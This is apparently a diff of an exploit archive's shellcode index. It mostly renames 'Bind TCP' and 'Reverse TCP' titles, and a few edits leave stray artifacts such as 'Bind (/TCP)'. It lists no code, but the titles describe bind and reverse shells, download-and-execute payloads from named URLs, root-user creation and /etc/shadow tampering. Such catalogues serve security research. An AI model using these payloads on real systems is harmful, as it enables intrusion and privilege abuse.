+13448,shellcodes/linux_x86/13448.c,"Linux/x86 - Bind (5074/TCP) Shell Shellcode (92 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86
+13449,shellcodes/linux_x86/13449.c,"Linux/x86 - Bind (5074/TCP) Shell + fork() Shellcode (130 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86
 13450,shellcodes/linux_x86/13450.c,"Linux/x86 - Add Root User (t00r) To /etc/passwd Shellcode (82 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86
 13451,shellcodes/linux_x86/13451.c,"Linux/x86 - Add Root User Shellcode (104 bytes)",2004-09-12,"Matt Conover",shellcode,linux_x86
 13452,shellcodes/linux_x86/13452.c,"Linux/x86 - Break chroot (../ 10x Loop) Shellcode (28 bytes)",2004-09-12,dev0id,shellcode,linux_x86
@@ -218,7 +218,7 @@ id,file,description,date,author,type,platform
 13460,shellcodes/linux_x86/13460.c,"Linux/x86 - execve(/bin/sh) + ToLower Encoded Shellcode (55 bytes)",2000-08-08,anonymous,shellcode,linux_x86
 13461,shellcodes/linux_x86/13461.c,"Linux/x86 - Add Root User (z) To /etc/passwd Shellcode (70 bytes)",2000-08-07,anonymous,shellcode,linux_x86
 13462,shellcodes/linux_x86/13462.c,"Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve(/bin/sh) Shellcode (132 bytes)",2000-08-07,anonymous,shellcode,linux_x86
-13463,shellcodes/linux_x86-64/13463.c,"Linux/x64 - Bind TCP (4444/TCP) Shell Shellcode (132 bytes)",2009-05-18,evil.xi4oyu,shellcode,linux_x86-64
+13463,shellcodes/linux_x86-64/13463.c,"Linux/x64 - Bind (4444/TCP) Shell Shellcode (132 bytes)",2009-05-18,evil.xi4oyu,shellcode,linux_x86-64
 13464,shellcodes/linux_x86-64/13464.s,"Linux/x64 - execve(/bin/sh) Shellcode (33 bytes)",2006-11-02,hophet,shellcode,linux_x86-64
 13465,shellcodes/multiple/13465.c,"Linux/PPC / Linux/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (99 bytes)",2005-11-15,"Charles Stevenson",shellcode,multiple
 13466,shellcodes/multiple/13466.c,"OSX/PPC / OSX/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (121 bytes)",2005-11-13,nemo,shellcode,multiple
@@ -226,12 +226,12 @@ id,file,description,date,author,type,platform
 13468,shellcodes/multiple/13468.c,"Linux/x86 / Unix/SPARC - execve(/bin/sh) Shellcode (80 bytes)",2004-09-12,dymitri,shellcode,multiple
 13469,shellcodes/multiple/13469.c,"BSD/x86 / Linux/x86 - execve(/bin/sh) Shellcode (38 bytes)",2004-09-12,dymitri,shellcode,multiple
 13470,shellcodes/netbsd_x86/13470.c,"NetBSD/x86 - Kill All Processes Shellcode (23 bytes)",2009-06-18,anonymous,shellcode,netbsd_x86
-13471,shellcodes/netbsd_x86/13471.c,"NetBSD/x86 - Reverse TCP (6666/TCP) Shell Shellcode (83 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86
+13471,shellcodes/netbsd_x86/13471.c,"NetBSD/x86 - Reverse (6666/TCP) Shell Shellcode (83 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86
 13472,shellcodes/netbsd_x86/13472.c,"NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL) Shellcode (29 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86
 13473,shellcodes/netbsd_x86/13473.c,"NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL) Shellcode (30 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86
 13474,shellcodes/netbsd_x86/13474.c,"NetBSD/x86 - execve(/bin/sh) Shellcode (68 bytes)",2004-09-26,humble,shellcode,netbsd_x86
 13475,shellcodes/openbsd_x86/13475.c,"OpenBSD/x86 - execve(/bin/sh) Shellcode (23 bytes)",2006-05-01,hophet,shellcode,openbsd_x86
-13476,shellcodes/openbsd_x86/13476.c,"OpenBSD/x86 - Bind TCP (6969/TCP) Shell Shellcode (148 bytes)",2004-09-26,"Sinan Eren",shellcode,openbsd_x86
+13476,shellcodes/openbsd_x86/13476.c,"OpenBSD/x86 - Bind (6969/TCP) Shell Shellcode (148 bytes)",2004-09-26,"Sinan Eren",shellcode,openbsd_x86
 13477,shellcodes/openbsd_x86/13477.c,"OpenBSD/x86 - Add Root User (w00w00) Shellcode (112 bytes)",2004-09-26,anonymous,shellcode,openbsd_x86
 13478,shellcodes/osx_ppc/13478.c,"OSX/PPC - sync() + reboot() Shellcode (32 bytes)",2006-05-01,hophet,shellcode,osx_ppc
 13479,shellcodes/osx_ppc/13479.c,"OSX/PPC - execve(/bin/sh) + exit() Shellcode (72 bytes)",2006-05-01,hophet,shellcode,osx_ppc
@@ -246,20 +246,20 @@ id,file,description,date,author,type,platform
 13488,shellcodes/sco_x86/13488.c,"SCO/x86 - execve(_/bin/sh__ ..._ NULL) Shellcode (43 bytes)",2005-11-30,"p. minervini",shellcode,sco_x86
 13489,shellcodes/solaris_mips/13489.c,"Solaris/MIPS - Download File (http://10.1.1.2:80/evil-dl) + Execute (/tmp/ff) Shellcode (278 bytes)",2006-11-21,xort,shellcode,solaris_mips
 13490,shellcodes/solaris_sparc/13490.c,"Solaris/SPARC - setreuid() + Executes Command Shellcode (92+ bytes)",2006-10-21,bunker,shellcode,solaris_sparc
-13491,shellcodes/generator/13491.c,"Solaris/MIPS - Reverse TCP (10.0.0.3:44434/TCP) Shell + XNOR Encoded Traffic Shellcode (600 bytes) (Generator)",2006-07-21,xort,shellcode,generator
+13491,shellcodes/generator/13491.c,"Solaris/MIPS - Reverse (10.0.0.3:44434/TCP) Shell + XNOR Encoded Traffic Shellcode (600 bytes) (Generator)",2006-07-21,xort,shellcode,generator
 13492,shellcodes/solaris_sparc/13492.c,"Solaris/SPARC - setreuid() + execve() Shellcode (56 bytes)",2005-11-20,lhall,shellcode,solaris_sparc
-13493,shellcodes/solaris_sparc/13493.c,"Solaris/SPARC - Bind TCP (6666/TCP) Shell Shellcode (240 bytes)",2005-11-20,lhall,shellcode,solaris_sparc
+13493,shellcodes/solaris_sparc/13493.c,"Solaris/SPARC - Bind (6666/TCP) Shell Shellcode (240 bytes)",2005-11-20,lhall,shellcode,solaris_sparc
 13494,shellcodes/solaris_sparc/13494.c,"Solaris/SPARC - execve(/bin/sh) Shellcode (52 bytes)",2004-09-26,LSD-PLaNET,shellcode,solaris_sparc
-13495,shellcodes/solaris_sparc/13495.c,"Solaris/SPARC - Bind TCP (6789/TCP) Shell (/bin/sh) Shellcode (228 bytes)",2004-09-26,"Claes M. Nyberg",shellcode,solaris_sparc
-13496,shellcodes/solaris_sparc/13496.c,"Solaris/SPARC - Reverse TCP (192.168.1.4:5678/TCP) Shell (/bin/sh) Shellcode (204 bytes)",2004-09-26,"Claes M. Nyberg",shellcode,solaris_sparc
-13497,shellcodes/solaris_sparc/13497.c,"Solaris/SPARC - Bind TCP Shell Shellcode (240 bytes)",2000-11-19,dopesquad.net,shellcode,solaris_sparc
-13498,shellcodes/generator/13498.php,"Solaris/x86 - Bind TCP Shell Shellcode (Generator)",2009-06-16,"Jonathan Salwan",shellcode,generator
+13495,shellcodes/solaris_sparc/13495.c,"Solaris/SPARC - Bind (6789/TCP) Shell (/bin/sh) Shellcode (228 bytes)",2004-09-26,"Claes M. Nyberg",shellcode,solaris_sparc
+13496,shellcodes/solaris_sparc/13496.c,"Solaris/SPARC - Reverse (192.168.1.4:5678/TCP) Shell (/bin/sh) Shellcode (204 bytes)",2004-09-26,"Claes M. Nyberg",shellcode,solaris_sparc
+13497,shellcodes/solaris_sparc/13497.c,"Solaris/SPARC - Bind (/TCP) Shell Shellcode (240 bytes)",2000-11-19,dopesquad.net,shellcode,solaris_sparc
+13498,shellcodes/generator/13498.php,"Solaris/x86 - Bind (/TCP) Shell Shellcode (Generator)",2009-06-16,"Jonathan Salwan",shellcode,generator
 13499,shellcodes/solaris_x86/13499.c,"Solaris/x86 - setuid(0) + execve(/bin/sh) + exit(0) + Null-Free Shellcode (39 bytes)",2008-12-02,sm4x,shellcode,solaris_x86
 13500,shellcodes/solaris_x86/13500.c,"Solaris/x86 - setuid(0) + execve(/bin/cat_ /etc/shadow) + exit(0) Shellcode (59 bytes)",2008-12-02,sm4x,shellcode,solaris_x86
 13501,shellcodes/solaris_x86/13501.c,"Solaris/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (84 bytes)",2004-09-26,anonymous,shellcode,solaris_x86
 13502,shellcodes/solaris_x86/13502.c,"Solaris/x86 - inetd Add Service + execve() Shellcode (201 bytes)",2004-09-26,anonymous,shellcode,solaris_x86
 13503,shellcodes/unixware/13503.c,"UnixWare - execve(/bin/sh) Shellcode (95 bytes)",2004-09-26,K2,shellcode,unixware
-13504,shellcodes/windows_x86/13504.asm,"Windows/x86 (5.0 < 7.0) - Bind TCP (28876/TCP) Shell + Null-Free Shellcode",2009-07-27,Skylined,shellcode,windows_x86
+13504,shellcodes/windows_x86/13504.asm,"Windows/x86 (5.0 < 7.0) - Bind (28876/TCP) Shell + Null-Free Shellcode",2009-07-27,Skylined,shellcode,windows_x86
 13505,shellcodes/windows_x86/13505.c,"Windows/x86 (XP SP2) (English) - cmd.exe Shellcode (23 bytes)",2009-07-17,Stack,shellcode,windows_x86
 13507,shellcodes/windows_x86/13507.txt,"Windows/x86 - Egg Omelet SEH Shellcode",2009-03-16,Skylined,shellcode,windows_x86
 13508,shellcodes/windows_x86/13508.asm,"Windows/x86 - Add Administrator User (GAZZA/123456) + Start Telnet Service Shellcode (111 bytes)",2009-02-27,DATA_SNIPER,shellcode,windows_x86
@@ -268,7 +268,7 @@ id,file,description,date,author,type,platform
 13511,shellcodes/windows_x86/13511.c,"Windows/x86 (XP SP2) - cmd.exe Shellcode (57 bytes)",2009-02-03,Stack,shellcode,windows_x86
 13512,shellcodes/windows_x86/13512.c,"Windows/x86 - PEB 'Kernel32.dll' ImageBase Finder + Alphanumeric Shellcode (67 bytes)",2008-09-03,Koshi,shellcode,windows_x86
 13513,shellcodes/windows_x86/13513.c,"Windows/x86 - PEB 'Kernel32.dll' ImageBase Finder + ASCII Printable Shellcode (49 bytes)",2008-09-03,Koshi,shellcode,windows_x86
-13514,shellcodes/windows_x86/13514.asm,"Windows/x86 - Reverse TCP + Download File + Save + Execute Shellcode",2008-08-25,loco,shellcode,windows_x86
+13514,shellcodes/windows_x86/13514.asm,"Windows/x86 - Reverse (/TCP) + Download File + Save + Execute Shellcode",2008-08-25,loco,shellcode,windows_x86
 13515,shellcodes/generator/13515.pl,"Windows/x86 - Download File + Execute Shellcode (Browsers Edition) (275+ bytes) (Generator)",2008-03-14,"YAG KOHHA",shellcode,generator
 13516,shellcodes/windows_x86/13516.asm,"Windows/x86 - Download File + Execute Shellcode (192 bytes)",2007-06-27,czy,shellcode,windows_x86
 13517,shellcodes/windows_x86/13517.asm,"Windows/x86 - Download File (http://127.0.0.1/file.exe) + Execute Shellcode (124 bytes)",2007-06-14,Weiss,shellcode,windows_x86
@@ -282,10 +282,10 @@ id,file,description,date,author,type,platform
 13525,shellcodes/windows_x86/13525.c,"Windows (9x/NT/2000/XP) - PEB Method Shellcode (29 bytes)",2005-07-26,loco,shellcode,windows_x86
 13526,shellcodes/windows_x86/13526.c,"Windows (9x/NT/2000/XP) - PEB Method Shellcode (31 bytes)",2005-01-26,twoci,shellcode,windows_x86
 13527,shellcodes/windows_x86/13527.c,"Windows (9x/NT/2000/XP) - PEB Method Shellcode (35 bytes)",2005-01-09,oc192,shellcode,windows_x86
-13528,shellcodes/generator/13528.c,"Windows (XP/2000/2003) - Reverse TCP (127.0.0.1:53/TCP) Shell Shellcode (275 bytes) (Generator)",2004-10-25,lion,shellcode,generator
+13528,shellcodes/generator/13528.c,"Windows (XP/2000/2003) - Reverse (127.0.0.1:53/TCP) Shell Shellcode (275 bytes) (Generator)",2004-10-25,lion,shellcode,generator
 13529,shellcodes/windows_x86/13529.c,"Windows (XP/2000/2003) - Download File (http://127.0.0.1/test.exe) + Execute (%systemdir%/a.exe) Shellcode (241 bytes)",2004-10-25,lion,shellcode,windows_x86
 13530,shellcodes/windows_x86/13530.asm,"Windows (XP) - Download File (http://www.elitehaven.net/ncat.exe) + Execute (nc.exe) + Null-Free Shellcode",2004-09-26,"Peter Winter-Smith",shellcode,windows_x86
-13531,shellcodes/windows_x86/13531.c,"Windows (XP SP1) - Bind TCP (58821/TCP) Shell Shellcode (116 bytes)",2004-09-26,silicon,shellcode,windows_x86
+13531,shellcodes/windows_x86/13531.c,"Windows (XP SP1) - Bind (58821/TCP) Shell Shellcode (116 bytes)",2004-09-26,silicon,shellcode,windows_x86
 13532,shellcodes/windows_x86/13532.asm,"Windows - DCOM RPC2 Universal Shellcode",2003-10-09,anonymous,shellcode,windows_x86
 13533,shellcodes/windows_x86-64/13533.asm,"Windows/x64 - URLDownloadToFileA(http://localhost/trojan.exe) + Execute Shellcode (218+ bytes)",2006-08-07,Weiss,shellcode,windows_x86-64
 13548,shellcodes/linux_x86/13548.asm,"Linux/x86 - Kill All Processes Shellcode (9 bytes)",2010-01-14,root@thegibson,shellcode,linux_x86
@@ -298,7 +298,7 @@ id,file,description,date,author,type,platform
 13565,shellcodes/windows_x86/13565.asm,"Windows/x86 (XP SP3) - ShellExecuteA() Shellcode",2009-12-19,sinn3r,shellcode,windows_x86
 13566,shellcodes/linux_x86/13566.c,"Linux/x86 - setreuid(0_0) + execve(/bin/rm /etc/shadow) Shellcode",2009-12-19,mr_me,shellcode,linux_x86
 13569,shellcodes/windows_x86/13569.asm,"Windows/x86 (XP SP3) - Add Firewall Rule (Allow 445/TCP) Shellcode",2009-12-24,sinn3r,shellcode,windows_x86
-13570,shellcodes/freebsd_x86/13570.c,"FreeBSD/x86 - Bind TCP (1337/TCP) Shell (/bin/sh) Shellcode (167 bytes)",2009-12-24,sbz,shellcode,freebsd_x86
+13570,shellcodes/freebsd_x86/13570.c,"FreeBSD/x86 - Bind (1337/TCP) Shell (/bin/sh) Shellcode (167 bytes)",2009-12-24,sbz,shellcode,freebsd_x86
 13571,shellcodes/windows_x86/13571.c,"Windows/x86 (XP SP2) - calc.exe Shellcode (45 bytes)",2009-12-24,Stack,shellcode,windows_x86
 13572,shellcodes/linux_x86/13572.c,"Linux/x86 - unlink(/etc/passwd) + exit() Shellcode (35 bytes)",2009-12-24,$andman,shellcode,linux_x86
 13574,shellcodes/windows_x86/13574.c,"Windows/x86 (XP SP2) (English / Arabic) - cmd.exe Shellcode (23 bytes)",2009-12-28,"AnTi SeCuRe",shellcode,windows_x86
@@ -330,7 +330,7 @@ id,file,description,date,author,type,platform
 13647,shellcodes/windows_x86/13647.txt,"Windows/x86 (XP SP3) (Russia) - WinExec(cmd.exe) + ExitProcess Shellcode (12 bytes)",2010-03-24,"lord Kelvin",shellcode,windows_x86
 13648,shellcodes/windows_x86/13648.rb,"Windows/x86 - MessageBox Shellcode (Generator) (Metasploit)",2010-03-24,corelanc0d3r,shellcode,windows_x86
 13649,shellcodes/windows/13649.as,"Windows (XP/Vista/7) - Egghunter (0x07333531) JITed Stage-0 Adjusted Universal Shellcode",2010-03-27,"Alexey Sintsov",shellcode,windows
-13661,shellcodes/linux_x86/13661.txt,"Linux/x86 - Bind TCP (13377/TCP) Netcat Shell Shellcode",2010-04-02,anonymous,shellcode,linux_x86
+13661,shellcodes/linux_x86/13661.txt,"Linux/x86 - Bind (13377/TCP) Netcat Shell Shellcode",2010-04-02,anonymous,shellcode,linux_x86
 13669,shellcodes/linux_x86/13669.c,"Linux/x86 - chmod 0666 /etc/shadow Shellcode (36 bytes)",2010-04-14,Magnefikko,shellcode,linux_x86
 13670,shellcodes/linux_x86/13670.c,"Linux/x86 - execve(/bin/sh) Shellcode (25 bytes)",2010-04-14,Magnefikko,shellcode,linux_x86
 13671,shellcodes/linux_x86/13671.c,"Linux/x86 - DoS Badger Game Shellcode (6 bytes)",2010-04-14,Magnefikko,shellcode,linux_x86
@@ -371,11 +371,11 @@ id,file,description,date,author,type,platform
 13733,shellcodes/solaris/13733.c,"Solaris/x86 - SystemV killall Command Shellcode (39 bytes)",2010-06-03,"Jonathan Salwan",shellcode,solaris
 13742,shellcodes/linux_x86/13742.c,"Linux/x86 - chown root:root /bin/sh Shellcode (48 bytes)",2010-06-06,gunslinger_,shellcode,linux_x86
 13743,shellcodes/linux_x86/13743.c,"Linux/x86 - Give All Users Root Access When Executing /bin/sh Shellcode (45 bytes)",2010-06-06,gunslinger_,shellcode,linux_x86
-14334,shellcodes/linux_x86/14334.c,"Linux/x86 - Reverse TCP (8080/TCP) Netcat Shell Shellcode (76 bytes)",2010-07-11,blake,shellcode,linux_x86
+14334,shellcodes/linux_x86/14334.c,"Linux/x86 - Reverse (8080/TCP) Netcat Shell Shellcode (76 bytes)",2010-07-11,blake,shellcode,linux_x86
 13828,shellcodes/windows/13828.c,"Windows - MessageBoxA() Shellcode (238 bytes)",2010-06-11,RubberDuck,shellcode,windows
 13875,shellcodes/solaris_x86/13875.c,"Solaris/x86 - Sync() + reboot() + exit(0) Shellcode (48 bytes)",2010-06-14,"Jonathan Salwan",shellcode,solaris_x86
 13908,shellcodes/linux_x86-64/13908.c,"Linux/x64 - Disable ASLR Security Shellcode (143 bytes)",2010-06-17,"Jonathan Salwan",shellcode,linux_x86-64
-13910,shellcodes/linux_x86/13910.c,"Linux/x86 - Bind TCP (31337/TCP) Shell + setreuid(0_0) + Polymorphic Shellcode (131 bytes)",2010-06-17,gunslinger_,shellcode,linux_x86
+13910,shellcodes/linux_x86/13910.c,"Linux/x86 - Bind (31337/TCP) Shell + setreuid(0_0) + Polymorphic Shellcode (131 bytes)",2010-06-17,gunslinger_,shellcode,linux_x86
 13915,shellcodes/linux_x86-64/13915.c,"Linux/x64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes)",2010-06-17,"Jonathan Salwan",shellcode,linux_x86-64
 13943,shellcodes/linux_x86-64/13943.c,"Linux/x64 - Add Root User (shell-storm/leet) To /etc/{passwd_shadow} Shellcode (390 bytes)",2010-06-20,"Jonathan Salwan",shellcode,linux_x86-64
 14014,shellcodes/generator/14014.pl,"Windows (XP SP3) (Spanish) - URLDownloadToFileA() + CreateProcessA() + ExitProcess() Shellcode (176+ bytes) (Generator)",2010-06-24,d0lc3,shellcode,generator
@@ -387,20 +387,20 @@ id,file,description,date,author,type,platform
 14122,shellcodes/arm/14122.c,"Linux/ARM - chmod 0777 /etc/shadow Shellcode (35 bytes)",2010-06-29,"Florian Gaultier",shellcode,arm
 14139,shellcodes/arm/14139.c,"Linux/ARM - Disable ASLR Security Shellcode (102 bytes)",2010-06-30,"Jonathan Salwan",shellcode,arm
 14190,shellcodes/arm/14190.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) + XOR 88 Encoded + Polymorphic Shellcode (78 bytes)",2010-07-03,"Jonathan Salwan",shellcode,arm
-14216,shellcodes/linux_x86/14216.c,"Linux/x86 - Bind TCP (64533/TCP) Shell (/bin/sh) Shellcode (97 bytes)",2010-07-05,Magnefikko,shellcode,linux_x86
+14216,shellcodes/linux_x86/14216.c,"Linux/x86 - Bind (64533/TCP) Shell (/bin/sh) Shellcode (97 bytes)",2010-07-05,Magnefikko,shellcode,linux_x86
 14218,shellcodes/linux/14218.c,"Linux - Write SUID Root Shell (/tmp/.hiddenshell) + Polymorphic Shellcode (161 bytes)",2010-07-05,gunslinger_,shellcode,linux
 14219,shellcodes/linux/14219.c,"Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) + XOR Encoded Shellcode (62 bytes)",2010-07-05,gunslinger_,shellcode,linux
 14221,shellcodes/windows/14221.html,"Safari 4.0.5 < 5.0.0 (Windows XP/7) - JavaScript JITed exec calc (ASLR/DEP Bypass) + Null-Free Shellcode",2010-07-05,"Alexey Sintsov",shellcode,windows
-14234,shellcodes/linux_x86/14234.c,"Linux/x86 - Bind TCP (6778/TCP) Shell + XOR Encoded + Polymorphic Shellcode (125 bytes)",2010-07-05,gunslinger_,shellcode,linux_x86
-14235,shellcodes/linux_x86/14235.c,"Linux/x86 - Bind TCP (31337/TCP) Netcat Shell + Polymorphic Shellcode (91 bytes)",2010-07-05,gunslinger_,shellcode,linux_x86
+14234,shellcodes/linux_x86/14234.c,"Linux/x86 - Bind (6778/TCP) Shell + XOR Encoded + Polymorphic Shellcode (125 bytes)",2010-07-05,gunslinger_,shellcode,linux_x86
+14235,shellcodes/linux_x86/14235.c,"Linux/x86 - Bind (31337/TCP) Netcat Shell + Polymorphic Shellcode (91 bytes)",2010-07-05,gunslinger_,shellcode,linux_x86
 14261,shellcodes/generator/14261.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) + Polymorphic Shellcode (Generator)",2010-07-07,"Jonathan Salwan",shellcode,generator
 14276,shellcodes/linux_x86/14276.c,"Linux/x86 - Find All Writeable Folder In FileSystem + Polymorphic Shellcode (91 bytes)",2010-07-08,gunslinger_,shellcode,linux_x86
 14288,shellcodes/windows_x86/14288.asm,"Windows/x86 - Write-to-file ('pwned' ./f.txt) + Null-Free Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",shellcode,windows_x86
 14305,shellcodes/linux_x86-64/14305.c,"Linux/x64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (49 bytes)",2010-07-09,10n1z3d,shellcode,linux_x86-64
-14332,shellcodes/linux_x86/14332.c,"Linux/x86 - Bind TCP (8080/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (75 bytes)",2010-07-11,blake,shellcode,linux_x86
+14332,shellcodes/linux_x86/14332.c,"Linux/x86 - Bind (8080/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (75 bytes)",2010-07-11,blake,shellcode,linux_x86
 14691,shellcodes/linux_x86/14691.c,"Linux/x86 - execve(/bin/sh) + Polymorphic + Null-Free Shellcode (46 bytes)",2010-08-19,Aodrulez,shellcode,linux_x86
 14697,shellcodes/windows/14697.c,"Windows (XP SP3) (English) - MessageBoxA() Shellcode (87 bytes)",2010-08-20,"Glafkos Charalambous",shellcode,windows
-14795,shellcodes/bsd_x86/14795.c,"BSD/x86 - Bind TCP (2525/TCP) Shell Shellcode (167 bytes)",2010-08-25,beosroot,shellcode,bsd_x86
+14795,shellcodes/bsd_x86/14795.c,"BSD/x86 - Bind (2525/TCP) Shell Shellcode (167 bytes)",2010-08-25,beosroot,shellcode,bsd_x86
 14873,shellcodes/windows_x86/14873.asm,"Windows/x86 - Egghunter Checksum Routine Shellcode (18 bytes)",2010-09-01,dijital1,shellcode,windows_x86
 14907,shellcodes/arm/14907.c,"Linux/ARM - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (27 bytes)",2010-09-05,"Jonathan Salwan",shellcode,arm
 15063,shellcodes/windows_x86/15063.c,"Windows/x86 (XP SP3) (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes)",2010-09-20,ZoRLu,shellcode,windows_x86
@@ -408,69 +408,69 @@ id,file,description,date,author,type,platform
 15136,shellcodes/windows/15136.cpp,"Windows/ARM (Mobile 6.5 TR) - Phone Call Shellcode",2010-09-27,"Celil Ünüver",shellcode,windows
 15202,shellcodes/windows_x86/15202.c,"Windows/x86 (XP Professional SP3) (English) - Add Administrator User (secuid0/m0nk) Shellcode (113 bytes)",2010-10-04,"Anastasios Monachos",shellcode,windows_x86
 15203,shellcodes/windows_x86/15203.c,"Windows/x86 - Add Administrator User (secuid0/m0nk) Shellcode (326 bytes)",2010-10-04,"Anastasios Monachos",shellcode,windows_x86
-15314,shellcodes/arm/15314.asm,"Linux/ARM - Bind TCP (0x1337/TCP) Shell Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
-15315,shellcodes/arm/15315.asm,"Linux/ARM - Bind UDP (68/UDP) Listener + Reverse TCP (192.168.0.1:67/TCP) Shell Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
-15316,shellcodes/arm/15316.asm,"Linux/ARM - Bind TCP (0x1337/TCP) Listener + Receive Shellcode + Payload Loader Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
+15314,shellcodes/arm/15314.asm,"Linux/ARM - Bind (0x1337/TCP) Shell Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
+15315,shellcodes/arm/15315.asm,"Linux/ARM - Bind (68/UDP) Listener + Reverse (192.168.0.1:67/TCP) Shell Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
+15316,shellcodes/arm/15316.asm,"Linux/ARM - Bind (0x1337/TCP) Listener + Receive Shellcode + Payload Loader Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
 15317,shellcodes/arm/15317.asm,"Linux/ARM - ifconfig eth0 192.168.0.2 up Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
 15616,shellcodes/arm/15616.c,"Linux/ARM - Add Root User (shell-storm/toor) To /etc/passwd Shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",shellcode,arm
 15618,shellcodes/osx/15618.c,"OSX/x64 - setuid() + Shell(/bin/sh) Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",shellcode,osx
 15712,shellcodes/generator/15712.rb,"ARM - Add Root User Shellcode (66+ bytes) (Generator) (Metasploit)",2010-12-09,"Jonathan Salwan",shellcode,generator
 15879,shellcodes/windows_x86/15879.txt,"Windows/x86 (5.0 < 7.0) - Speaking 'You got pwned!' + Null-Free Shellcode",2010-12-31,Skylined,shellcode,windows_x86
-16025,shellcodes/generator/16025.c,"FreeBSD/x86 - Reverse TCP (127.0.0.1:1337/TCP) Shell (/bin/sh) Shellcode (81 bytes) (Generator)",2011-01-21,Tosh,shellcode,generator
-16026,shellcodes/freebsd_x86/16026.c,"FreeBSD/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + fork() Shellcode (111 bytes)",2011-01-21,Tosh,shellcode,freebsd_x86
+16025,shellcodes/generator/16025.c,"FreeBSD/x86 - Reverse (127.0.0.1:1337/TCP) Shell (/bin/sh) Shellcode (81 bytes) (Generator)",2011-01-21,Tosh,shellcode,generator
+16026,shellcodes/freebsd_x86/16026.c,"FreeBSD/x86 - Bind (31337/TCP) Shell (/bin/sh) + fork() Shellcode (111 bytes)",2011-01-21,Tosh,shellcode,freebsd_x86
 16283,shellcodes/windows_x86/16283.asm,"Windows/x86 - Eggsearch Shellcode (33 bytes)",2011-03-05,oxff,shellcode,windows_x86
 17432,shellcodes/superh_sh4/17432.c,"Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",shellcode,superh_sh4
-17194,shellcodes/linux_x86/17194.c,"Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic + XOR Encoded Shellcode (69/93 bytes)",2011-04-21,"Jonathan Salwan",shellcode,linux_x86
-17224,shellcodes/osx/17224.s,"OSX/x64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2011-04-29,hammackj,shellcode,osx
+17194,shellcodes/linux_x86/17194.c,"Linux/x86 - Bind (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic + XOR Encoded Shellcode (69/93 bytes)",2011-04-21,"Jonathan Salwan",shellcode,linux_x86
+17224,shellcodes/osx/17224.s,"OSX/x64 - Reverse (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2011-04-29,hammackj,shellcode,osx
 17323,shellcodes/windows/17323.c,"Windows - Add Administrator User (RubberDuck/mudbath) + ExitProcess WinExec Shellcode (279 bytes)",2011-05-25,RubberDuck,shellcode,windows
 20195,shellcodes/linux_x86/20195.c,"Linux/x86 - Disable ASLR Security Shellcode (83 bytes)",2012-08-02,"Jean Pascal Pereira",shellcode,linux_x86
 17326,shellcodes/generator/17326.rb,"Windows - Download File + Execute via DNS + IPv6 Shellcode (Generator) (Metasploit)",2011-05-26,"Alexey Sintsov",shellcode,generator
-17371,shellcodes/linux_x86/17371.c,"Linux/x86 - Reverse TCP (localhost:8080/TCP) Shell + SSL Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",shellcode,linux_x86
+17371,shellcodes/linux_x86/17371.c,"Linux/x86 - Reverse (localhost:8080/TCP) Shell + SSL Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",shellcode,linux_x86
 17439,shellcodes/superh_sh4/17439.c,"Linux/SuperH (sh4) - Add Root User (shell-storm/toor) To /etc/passwd Shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",shellcode,superh_sh4
 17545,shellcodes/windows_x86/17545.c,"Windows/x86 (PerfectXp-pc1/SP3 ) (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,shellcode,windows_x86
 17559,shellcodes/linux_x86/17559.c,"Linux/x86 - Egghunter + Null-Free Shellcode (29 bytes)",2011-07-21,"Ali Raheem",shellcode,linux_x86
-17564,shellcodes/osx/17564.asm,"OSX/x64 - Universal ROP + Reverse TCP Shell Shellcode",2011-07-24,pa_kt,shellcode,osx
+17564,shellcodes/osx/17564.asm,"OSX/x64 - Universal ROP + Reverse (/TCP) Shell Shellcode",2011-07-24,pa_kt,shellcode,osx
 17940,shellcodes/linux_mips/17940.c,"Linux/MIPS - execve(/bin/sh) Shellcode (52 bytes)",2011-10-07,entropy,shellcode,linux_mips
